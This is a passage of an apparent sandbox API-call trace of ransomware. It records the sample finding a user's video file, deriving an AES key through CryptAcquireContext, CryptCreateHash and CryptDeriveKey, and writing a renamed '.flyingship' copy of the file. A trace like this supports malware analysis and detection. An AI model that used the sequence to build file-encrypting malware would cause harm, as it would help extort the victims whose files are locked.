lpString1="y_uRj.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.664] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.664] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0198.664] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.664] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.664] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.664] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.664] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.664] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.665] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.665] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e7e620, ftCreationTime.dwHighDateTime=0x1d5dfbe, ftLastAccessTime.dwLowDateTime=0xaf27bc50, ftLastAccessTime.dwHighDateTime=0x1d5deed, ftLastWriteTime.dwLowDateTime=0xaf27bc50, ftLastWriteTime.dwHighDateTime=0x1d5deed, nFileSizeHigh=0x0, nFileSizeLow=0x425e, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="z4iUj36y_uRj.flv", cAlternateFileName="Z4IUJ3~1.FLV")) returned 0x90ae18 [0198.665] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0198.665] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.665] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.665] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.665] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0198.665] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.665] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0198.665] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.665] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.665] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0198.666] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.666] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.666] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.666] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.666] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0198.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.666] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0198.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.667] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0198.667] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.667] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.667] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.667] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.667] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.668] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.668] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.668] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.668] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0198.668] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.668] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.668] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.668] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.668] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.668] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.668] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.668] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.668] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.668] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.668] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.668] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.668] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.668] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.668] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.669] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.669] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.669] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.669] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0198.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.669] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0198.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.669] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.669] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.669] CryptHashData (hHash=0x90af58, pbData=0x8df000, dwDataLen=0x19, dwFlags=0x1) returned 1 [0198.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.670] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.670] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.670] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.670] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.670] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.670] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.670] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0198.670] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.670] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.670] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.671] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.671] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0198.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.671] CryptDestroyHash (hHash=0x90af58) returned 1 [0198.671] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.671] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.671] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.671] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.671] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.671] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z4iuj36y_urj.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.672] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.673] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0198.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0198.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0198.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0198.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.673] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0198.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0198.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0198.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0198.673] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0198.673] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0198.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0198.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0198.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0198.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0198.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0198.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0198.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0198.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0198.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0198.677] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0198.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0198.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0198.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flyingship.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z4iuj36y_urj.flyingship.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, 